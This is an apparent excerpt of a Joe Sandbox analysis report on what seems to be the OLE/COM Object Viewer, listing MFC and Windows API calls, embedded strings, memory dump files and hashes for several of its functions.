                                                                          • #6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D30279
                                                                          • #3087.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D30289
                                                                          • #6211.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D30290
                                                                          • #3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001), ref: 00D3029D
                                                                          • #6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001), ref: 00D302A4
                                                                          • #3087.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41), ref: 00D302B1
                                                                          • #6211.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41), ref: 00D302B8
                                                                          • #3087.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 00D302C5
                                                                          • #6211.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 00D302CC
                                                                          • #3087.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 00D302D9
                                                                          • #6211.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 00D302E0
                                                                          • #3087.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D302F1
                                                                          • #6211.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D302F8
                                                                          • #3087.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30308
                                                                          • #6211.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3030F
                                                                          • #3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D3031C
                                                                          • #6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D30323
                                                                          • #3087.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D30330
                                                                          • #6211.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D30337
                                                                          • #3087.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30348
                                                                          • #6211.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3034F
                                                                          • #3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3035C
                                                                          • #6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30363
                                                                          • #3087.MFC42U(000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30374
                                                                          • #6211.MFC42U(000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3037B
                                                                          • #3087.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30388
                                                                          • #6211.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3038F
                                                                          • #3087.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D3039C
                                                                          • #6211.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D303A3
                                                                          • #3087.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D303B0
                                                                          • #6211.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C), ref: 00D303B7
                                                                          • #3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001), ref: 00D303C4
                                                                          • #6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41,00000001,00000001), ref: 00D303CB
                                                                          • #3087.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41), ref: 00D303D8
                                                                          • #6211.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,00D2FC41), ref: 00D303DF
                                                                          • #3087.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 00D303EC
                                                                          • #6211.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 00D303F3
                                                                          • #3087.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00D30400
                                                                          • #6211.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00D30407
                                                                          • #3087.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 00D30414
                                                                          • #6211.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 00D3041B
                                                                          • #3087.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00D30431
                                                                          • #2634.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00D30438
                                                                          • #3087.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 00D30445
                                                                          • #2634.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 00D3044C
                                                                          • #3087.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00D30459
                                                                          • #2634.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00D30460
                                                                          • #3087.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 00D3046D
                                                                          • #2634.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 00D30474
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #3087$#6211$#2634
                                                                          • String ID:
                                                                          • API String ID: 3514023408-0
                                                                          • Opcode ID: 6f0e3403c5a9fdffc532d6e6f874f60796342d245e6ac2aad52af6158e0ddbce
                                                                          • Instruction ID: 3fac19a7701cf37455cefc1a8e8e95ac26784fa65ca93d0e901bf7b0241184ea
                                                                          • Opcode Fuzzy Hash: 6f0e3403c5a9fdffc532d6e6f874f60796342d245e6ac2aad52af6158e0ddbce
                                                                          • Instruction Fuzzy Hash: 60418C51F807A426FD1932791C6BF7E665ACBD9F45F00442872429F2D3DE6D8E0282BE

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • #4704.MFC42U ref: 00D2FCED
                                                                          • SendMessageW.USER32(?,00000143,00000000,None), ref: 00D2FD06
                                                                          • SendMessageW.USER32(?,00000143,00000000,Both), ref: 00D2FD19
                                                                          • SendMessageW.USER32(?,00000143,00000000,Free), ref: 00D2FD2C
                                                                          • SendMessageW.USER32(?,00000143,00000000,Apartment), ref: 00D2FD3F
                                                                          • SendMessageW.USER32(?,00000143,00000000,Neutral), ref: 00D2FD52
                                                                          • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00D2FD84
                                                                          • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2FD9E
                                                                          • SendMessageW.USER32(?,0000133E,00000002,00000001), ref: 00D2FDB8
                                                                          • #3087.MFC42U(0000008B,00000000), ref: 00D2FDC6
                                                                          • #2634.MFC42U(0000008B,00000000), ref: 00D2FDCD
                                                                          • #3087.MFC42U(000000A9,00000000,0000008B,00000000), ref: 00D2FDDA
                                                                          • #2634.MFC42U(000000A9,00000000,0000008B,00000000), ref: 00D2FDE1
                                                                          • #3087.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00D2FDEE
                                                                          • #2634.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00D2FDF5
                                                                          • LoadLibraryW.KERNEL32(OLE32.DLL,000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 00D2FDFF
                                                                          • GetProcAddress.KERNEL32(00000000,CoRegisterSurrogate), ref: 00D2FE11
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00D2FE26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#2634#3087$Library$#4704AddressFreeLoadProc
                                                                          • String ID: Apartment$Both$CoRegisterSurrogate$Free$Inproc Handler$Inproc Server$Local Server$Neutral$None$OLE32.DLL
                                                                          • API String ID: 2746026577-3659237039
                                                                          • Opcode ID: 5eb1c754aac4edcdd8bcbb566fcd2f12eba2217b62bc1f0d3b2515a634574290
                                                                          • Instruction ID: 4e6ccd1f167a45c96f456242692bf4a9d17c2e750d55fad173a3bdbee8b2501f
                                                                          • Opcode Fuzzy Hash: 5eb1c754aac4edcdd8bcbb566fcd2f12eba2217b62bc1f0d3b2515a634574290
                                                                          • Instruction Fuzzy Hash: 73317531A007206BDF206F65DC4EF9B7E79EF93714F010034B915992A1CBB585468BB0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D2EAED
                                                                          • #338.MFC42U(0000000C,00D2EAD7,00000004), ref: 00D2EAF7
                                                                          • #540.MFC42U(0000000C,00D2EAD7,00000004), ref: 00D2EB0B
                                                                          • #860.MFC42U(00D2349E,0000000C,00D2EAD7,00000004), ref: 00D2EB27
                                                                          • #540.MFC42U ref: 00D2EB36
                                                                          • #540.MFC42U ref: 00D2EB42
                                                                          • #4155.MFC42U(00000004), ref: 00D2EB50
                                                                          • #4155.MFC42U(00000008,00000004), ref: 00D2EB5A
                                                                          • #3516.MFC42U(?,?,00000005,00000008,00000004), ref: 00D2EB6E
                                                                          • #861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB7E
                                                                          • #3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB8D
                                                                          • #861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EB9D
                                                                          • #3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBAC
                                                                          • #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBB7
                                                                          • #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 00D2EBBF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #3516#540$#4155#800#861$#338#860H_prolog3
                                                                          • String ID: ExpertMode$ViewHiddenComCats
                                                                          • API String ID: 3415677798-816868219
                                                                          • Opcode ID: 90bfab63ae1bdb68f8eac94fbb958954790594b2a8d1e22ed145f5fbe1e99b5b
                                                                          • Instruction ID: d24ee639c4ae97fbe77972792bc11e38f27d9f0f2b12e17193af371209624c3c
                                                                          • Opcode Fuzzy Hash: 90bfab63ae1bdb68f8eac94fbb958954790594b2a8d1e22ed145f5fbe1e99b5b
                                                                          • Instruction Fuzzy Hash: 17213D75A4071A9BDF15EBA0C856BAEBB72EF64704F500818F5413B2D2DBB45A08CB71

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00D39205: SendMessageW.USER32(?,00001109,00D3803D,00000000), ref: 00D39220
                                                                            • Part of subcall function 00D39205: #2857.MFC42U(00000000,?,00D3803D,00000000,23685920), ref: 00D39227
                                                                          • #1662.MFC42U(00000000,23685920), ref: 00D3807F
                                                                            • Part of subcall function 00D2E18B: SendMessageW.USER32(?,0000000B,?,00000000), ref: 00D2E19A
                                                                          • CoCreateInstance.OLE32(00D236E4,00000000,00000001,00D236F4,00000000,00000000,23685920), ref: 00D380AB
                                                                            • Part of subcall function 00D37F0B: SendMessageW.USER32(?,00001132,00000000,00D34852), ref: 00D37F1D
                                                                          • #2644.MFC42U(00000000), ref: 00D38436
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#1662#2644#2857CreateInstance
                                                                          • String ID: All Objects$Application IDs$COM Library Objects$Grouped by Component Category$Interfaces$OLE 1.0 Objects$OLE Controls$OLE Embeddable Objects$Object Classes$Type Libraries$Unclassified Objects$g
                                                                          • API String ID: 2376137332-450955224
                                                                          • Opcode ID: 902d97033306d96569308cfde1b02ceffe69930922858f85ce5e5800fc051093
                                                                          • Instruction ID: 1a5b6980e20799fcfe6806b96381766b23cd806418ef0a8d2448aa40062d33cf
                                                                          • Opcode Fuzzy Hash: 902d97033306d96569308cfde1b02ceffe69930922858f85ce5e5800fc051093
                                                                          • Instruction Fuzzy Hash: 12E1CDB0E106199FDB54EFE4D899BAEBBB1FF44308F100528E011AB3A5DBB59845CF20

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • #3867.MFC42U(?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F09C
                                                                          • #3087.MFC42U(000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0B2
                                                                          • #2634.MFC42U(000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0B9
                                                                          • #3087.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0C6
                                                                          • #2634.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0CD
                                                                          • #3087.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0DA
                                                                          • #2634.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D2F0E1
                                                                          • #3087.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000), ref: 00D2F0EE
                                                                          • #2634.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000,0000009C,00000000), ref: 00D2F0F5
                                                                          • #3087.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000), ref: 00D2F102
                                                                          • #2634.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001,00000001,00000000), ref: 00D2F109
                                                                          • #3087.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001), ref: 00D2F116
                                                                          • #2634.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,00D2FC3A,00000001), ref: 00D2F11D
                                                                          • #3087.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 00D2F12A
                                                                          • #2634.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 00D2F131
                                                                          • #3087.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 00D2F13E
                                                                          • #2634.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 00D2F145
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2634#3087$#3867
                                                                          • String ID:
                                                                          • API String ID: 580456896-0
                                                                          • Opcode ID: 27a3e5da6b2e4892651e05f811b4cf3ab9f6ffa9aa382167568b2c16dca95e4d
                                                                          • Instruction ID: 36cf5bcfd09e6b42dd87f2c2fd828da1e3eb9c5890982298edb1b74923e263f1
                                                                          • Opcode Fuzzy Hash: 27a3e5da6b2e4892651e05f811b4cf3ab9f6ffa9aa382167568b2c16dca95e4d
                                                                          • Instruction Fuzzy Hash: BA01FF22F5137422DE3A36751C6BABE6A57CFD1B90F044418B1065F2D6DE794D02C2B9

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • #4714.MFC42U ref: 00D2DA47
                                                                          • #2078.MFC42U(00000085,?), ref: 00D2DA60
                                                                          • #2078.MFC42U(00000087,?,00000085,?), ref: 00D2DA71
                                                                          • #2078.MFC42U(00000088,?,00000087,?,00000085,?), ref: 00D2DA84
                                                                          • #2078.MFC42U(0000008B,?,00000088,?,00000087,?,00000085,?), ref: 00D2DA97
                                                                          • #2078.MFC42U(0000008E,?,0000008B,?,00000088,?,00000087,?,00000085,?), ref: 00D2DAAA
                                                                          • GetWindowRect.USER32(?,?), ref: 00D2DABE
                                                                          • GetWindowRect.USER32(?,?), ref: 00D2DAD0
                                                                            • Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8B7
                                                                            • Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8C4
                                                                            • Part of subcall function 00D2C8A6: #3133.MFC42U(?,?,?,00D2C46E,?), ref: 00D2C8CC
                                                                          • #6193.MFC42U(00000000,000000FF,?,?,?,0000001C,?), ref: 00D2DB03
                                                                          • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?,?,0000001C,?), ref: 00D2DB1B
                                                                          • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?), ref: 00D2DB34
                                                                          • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00D2DB48
                                                                          • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00D2DB5C
                                                                          • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 00D2DB70
                                                                          • #6127.MFC42U(00000001,00000001,00000001,6CBF0790,6CBF0790,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8), ref: 00D2DB84
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #6193$#2078$ClientRectScreenWindow$#3133#4714#6127
                                                                          • String ID:
                                                                          • API String ID: 1113752235-0
                                                                          • Opcode ID: 2716cb6146a59ee4fcced2e692245254e1b6d627975cce6a5bae301580869f48
                                                                          • Instruction ID: 1af59285f0a44940574a9402d6fb0d50ed24828f04b02a925da62dbff079dd97
                                                                          • Opcode Fuzzy Hash: 2716cb6146a59ee4fcced2e692245254e1b6d627975cce6a5bae301580869f48
                                                                          • Instruction Fuzzy Hash: B44141317402087BEB24DF55DC9AFEF3B69EB85B54F444078B609AE1C2DAA1AD05C770

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 577 d3bd2a-d3bd31 call d3d4cd 580 d3bd33-d3bd40 LoadLibraryW 577->580 581 d3bd80 577->581 582 d3bd42-d3bd49 580->582 583 d3bd5e-d3bd71 GetProcAddress 580->583 584 d3bd4e-d3bd58 MessageBoxW exit 582->584 583->581 585 d3bd73-d3bd7e 583->585 584->583 585->584
                                                                          APIs
                                                                            • Part of subcall function 00D3D4CD: GetVersionExW.KERNEL32(?), ref: 00D3D4F3
                                                                          • LoadLibraryW.KERNELBASE(ACLUI.DLL,00D2B51D), ref: 00D3BD38
                                                                          • MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 00D3BD50
                                                                          • exit.MSVCRT ref: 00D3BD58
                                                                          • GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 00D3BD64
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadMessageProcVersionexit
                                                                          • String ID: ACLUI.DLL$Couldn't get address of EditSecurity ACLUI.DLL!$Couldn't load ACLUI.DLL!$EditSecurity$OLEViewer$OleViewer
                                                                          • API String ID: 2950567464-1848169023
                                                                          • Opcode ID: d5bed083bae3a7f498afa30374348a925ce00fd729fb2eff4ed236aabe643341
                                                                          • Instruction ID: 6621c2b49a664c93a8452231213943b5f4a3015c6fd7139b3cfafc935a8ac42d
                                                                          • Opcode Fuzzy Hash: d5bed083bae3a7f498afa30374348a925ce00fd729fb2eff4ed236aabe643341
                                                                          • Instruction Fuzzy Hash: FCE01A34385795BFE7202FA07E0BF293995AB29B1BF080012B746E41E4DBB1D0585639

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
